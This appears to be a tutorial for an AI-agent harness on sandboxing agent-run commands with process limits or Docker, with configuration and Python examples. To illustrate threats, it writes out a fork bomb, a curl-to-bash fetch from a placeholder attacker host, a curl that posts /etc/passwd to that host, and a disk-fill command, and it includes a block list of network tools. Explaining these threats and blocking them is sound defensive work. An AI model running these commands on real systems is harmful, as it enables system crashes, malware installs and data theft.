Harness / Tutorials
Intermediate 20 min

Sandboxed Execution

Isolate AI agent commands with dual-mode sandboxing — process-level setrlimit or full Docker containers — with configurable resource limits.

Intermediate 20 min read

1Why Sandbox?

When you run harness --permission bypass, the agent executes commands without asking for confirmation. That is powerful and efficient — but without isolation, it also means the agent has unrestricted access to your system.

⚠ Without a Sandbox
harness --permission bypass gives an AI agent full access to your system. That includes network, filesystem, and processes. Consider what happens if the agent is given a malicious prompt or executes code from an untrusted source.

Real-world attack vectors that sandboxing prevents:

A fork bomb creates unlimited child processes, consuming all system resources and crashing the machine.

Bash
:(){ :|:& };:
# Sandbox prevents: max_processes limit blocks this immediately

A crypto miner installs and runs software in the background, consuming CPU indefinitely.

Bash
curl -s http://attacker.com/miner | bash
# Sandbox prevents: network blocked + blocked_commands includes curl

Data exfiltration sends sensitive files to an attacker-controlled server over the network.

Bash
curl attacker.com -d @/etc/passwd
# Sandbox prevents: network=none blocks all outbound connections

Disk fill creates an enormous file, consuming all available storage and crashing services.

Bash
dd if=/dev/zero of=bigfile bs=1G count=100
# Sandbox prevents: max_file_size_mb limit blocks writes above the cap
⚡ Most Configurable in Market

OpenHands has Docker-only sandbox. SWE-Agent has basic containers. No one offers dual-mode (process + Docker) with configurable resource limits like Harness.

Feature Harness OpenHands SWE-Agent Claude Code
Process sandbox (no Docker)
Docker sandbox
Memory limits Partial
CPU time limits
Process count limits
API key stripping
Blocked command list

2Process Sandbox

The process sandbox uses POSIX setrlimit system calls — the same mechanism the OS uses to enforce per-process resource limits. No Docker required.

Resource Limit System Call What It Controls
max_memory_mb RLIMIT_AS Total virtual memory the process can address
max_cpu_seconds RLIMIT_CPU CPU time before SIGXCPU / SIGKILL is sent
max_processes RLIMIT_NPROC Number of child processes the command can fork
ℹ max_file_size_mb is Docker-only
The max_file_size_mb limit is enforced only in Docker sandbox mode via the container runtime's storage limits. The process sandbox does not set RLIMIT_FSIZE — only RLIMIT_AS, RLIMIT_CPU, and RLIMIT_NPROC are applied.
Advantages
  • No Docker installation required
  • Minimal overhead — native OS calls
  • Works on Linux and macOS
  • Instant startup — no container spin-up
Limitations
  • Shared filesystem with host
  • Not as strong as container isolation
  • No network namespace separation
  • Suitable for trusted-but-resource-limited code
Bash
harness --sandbox process "Run the test suite"

3Docker Sandbox

The Docker sandbox runs every command in an isolated container. It provides the strongest isolation available — separate filesystem, network namespace, and process tree.

ℹ API Key Stripping Applies to Both Modes
API keys are automatically stripped from the environment in both process and Docker sandbox modes. You cannot accidentally expose credentials to agent-executed commands regardless of which sandbox mode you use.
Advantages
  • Full filesystem isolation
  • Network namespace — --network=none
  • Strongest isolation available
  • Custom images for reproducible envs
Requirements
  • Docker must be installed
  • Docker daemon must be running
  • Slower startup than process mode
  • Image pull required on first use
Bash
harness --sandbox docker "Run the test suite"
# Requires: Docker installed and daemon running
# Default image: python:3.12-slim

4TOML Configuration

Configure sandboxing persistently in .harness/config.toml:

TOML .harness/config.toml
[sandbox]
enabled = true
mode = "process"              # "none", "process", or "docker"
max_memory_mb = 512           # Memory limit per command
max_cpu_seconds = 30          # CPU time limit per command
network_access = false        # Block network access
docker_image = "python:3.12-slim"  # Docker image (docker mode only)
allowed_paths = [
    "/home/user/project",     # Only allow access to project dir
    "/tmp",                   # And temp directory
]
blocked_commands = [
    "rm -rf /",               # Block dangerous commands
    "curl",                   # Block network tools
    "wget",
    "nc",
]
ℹ SandboxConfig vs SandboxPolicy
The TOML [sandbox] section maps to SandboxConfig — a simple, flat configuration dataclass used for file-based configuration. When the engine starts a session, it converts SandboxConfig into a SandboxPolicy (the runtime struct), which includes the nested ResourceLimits and NetworkPolicy sub-objects. If you are building pipelines programmatically, construct SandboxPolicy directly (see the Deep Dive below) rather than going through SandboxConfig.

The complete type hierarchy — use these dataclasses directly when building custom sandboxed pipelines:

Python
from harness.types.sandbox import (
    SandboxMode, SandboxPolicy, ResourceLimits, NetworkPolicy
)

# SandboxMode enum
# SandboxMode.NONE    = "none"     — no isolation
# SandboxMode.PROCESS = "process"  — setrlimit isolation
# SandboxMode.DOCKER  = "docker"   — container isolation

# ResourceLimits defaults
limits = ResourceLimits(
    max_memory_mb=512,    # 512MB virtual memory cap
    max_cpu_seconds=30,   # 30 seconds CPU time
    max_processes=64,     # 64 child processes
    max_file_size_mb=100, # 100MB per file written
)

# NetworkPolicy defaults
network = NetworkPolicy(
    allow_network=False,         # Block all network
    allowed_hosts=(),            # Allowlist (empty = block all)
    blocked_ports=(),            # Port blocklist
)

# Full SandboxPolicy
policy = SandboxPolicy(
    mode=SandboxMode.DOCKER,
    allowed_paths=("/home/user/project", "/tmp"),
    blocked_commands=("rm -rf", "curl", "wget", "nc"),
    resource_limits=limits,
    network=network,
    docker_image="python:3.12-slim",
    env_passthrough=("HOME", "PATH"),   # Pass these through to container
    # strip_env defaults (always stripped in both process and Docker modes):
    # ANTHROPIC_API_KEY, OPENAI_API_KEY, GOOGLE_API_KEY,
    # AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN
)

strip_env defaults are enforced in both process and Docker modes regardless of env_passthrough. You cannot accidentally pass API keys into the sandbox.

5Trigger Resource Limits

The script below demonstrates all four enforcement mechanisms with intentionally tight limits. Each test shows how ExecutionResult reports the failure:

Python sandbox_demo.py
# sandbox_demo.py — demonstrates sandbox resource limits
import asyncio
from harness.sandbox.executor import create_executor
from harness.types.sandbox import SandboxPolicy, SandboxMode, ResourceLimits

async def main():
    policy = SandboxPolicy(
        mode=SandboxMode.PROCESS,
        resource_limits=ResourceLimits(
            max_memory_mb=64,      # Very low — 64MB
            max_cpu_seconds=5,     # Very short — 5 seconds
            max_processes=8,       # Very few processes
        ),
        blocked_commands=("rm -rf", "curl", "wget"),
    )
    executor = create_executor(policy)

    # Test 1: Memory limit
    print("Test 1: Memory limit (64MB)...")
    result = await executor.execute("python3 -c \"x = 'a' * (100 * 1024 * 1024)\"")
    print(f"  Exit: {result.exit_code}, OOM: {result.oom_killed}")
    # Expected: oom_killed=True

    # Test 2: CPU timeout
    print("Test 2: CPU timeout (5s)...")
    result = await executor.execute("python3 -c \"while True: pass\"")
    print(f"  Exit: {result.exit_code}, Timed out: {result.timed_out}")
    # Expected: timed_out=True

    # Test 3: Blocked command
    print("Test 3: Blocked command...")
    error = executor.validate_command("rm -rf /")
    print(f"  Validation: {error}")
    # Expected: "Command blocked by sandbox policy"

    # Test 4: Normal execution
    print("Test 4: Normal execution...")
    result = await executor.execute("echo 'Hello from sandbox!'")
    print(f"  Output: {result.stdout.strip()}")
    print(f"  Exit: {result.exit_code}")
    # Expected: "Hello from sandbox!", exit_code=0

    await executor.cleanup()

asyncio.run(main())

Expected output for each test:

Test 1 — Memory OOM
Test 1: Memory limit (64MB)...
  Exit: -9, OOM: True
Test 2 — CPU Timeout
Test 2: CPU timeout (5s)...
  Exit: -24, Timed out: True
Test 3 — Blocked Command
Test 3: Blocked command...
  Validation: Command blocked by sandbox policy
Test 4 — Normal Execution
Test 4: Normal execution...
  Output: Hello from sandbox!
  Exit: 0
ℹ ExecutionResult Fields
  • stdout — captured standard output
  • exit_code — process exit code (negative = killed by signal)
  • timed_out — True if CPU limit was exceeded
  • oom_killed — True if memory limit was exceeded
  • error — error message string if execution failed to start

6CLI Override

Override the configured sandbox mode for a single invocation using --sandbox. This does not modify config.toml — it applies only to that run:

Bash
# Override sandbox mode per invocation
harness --sandbox docker "Run untrusted tests"
harness --sandbox process "Quick analysis"
harness --sandbox none "Trusted local task"
▶ Try It
Run harness --sandbox process "print the output of: python3 -c 'import sys; print(sys.version)'" to verify the sandbox is active. The output will be the Python version inside the sandbox environment.

7Build an Untrusted Code Runner

Combine sandbox_mode="docker" with permission_mode="bypass" for a safe, fully-automated code execution pipeline. The Docker sandbox provides defense-in-depth even when the permission system is permissive:

Python untrusted_runner.py
# untrusted_runner.py
import asyncio
import harness

async def run_untrusted(code: str) -> str:
    """Run AI-generated code in a sandboxed environment."""
    prompt = f"""Execute this code and report the output:
```python
{code}
```
If the code fails, explain why and suggest a fix."""

    result_text = ""
    async for msg in harness.run(
        prompt,
        provider="anthropic",
        model="claude-sonnet-4-20250514",
        permission_mode="bypass",     # Auto-approve (safe because sandboxed)
        sandbox_mode="docker",        # Full Docker isolation
        max_turns=5,
    ):
        if isinstance(msg, harness.Result):
            result_text = msg.text

    return result_text

# Example usage
async def main():
    # Safe: sandboxed — even if the code is malicious
    output = await run_untrusted("""
import os
print(os.listdir('/'))
print(os.environ.get('ANTHROPIC_API_KEY', 'NOT FOUND'))
""")
    print(output)
    # API key will be "NOT FOUND" because sandbox strips it!

asyncio.run(main())
✓ Defense in Depth
Even with permission_mode='bypass', the Docker sandbox strips API keys (as does process mode), blocks network access, and limits resources. The agent cannot leak credentials or make external calls — regardless of what the code tries to do.
ℹ Default strip_env List

These environment variables are always stripped from the environment in both process and Docker sandbox modes:

Python
strip_env = (
    "ANTHROPIC_API_KEY",
    "OPENAI_API_KEY",
    "GOOGLE_API_KEY",
    "AWS_SECRET_ACCESS_KEY",
    "GITHUB_TOKEN",
)

You can extend this list via SandboxPolicy(strip_env=(..., "MY_SECRET")), but the defaults are always enforced — they cannot be overridden to pass through.

8Next Steps

You now have sandboxed execution configured. Here is what to explore next: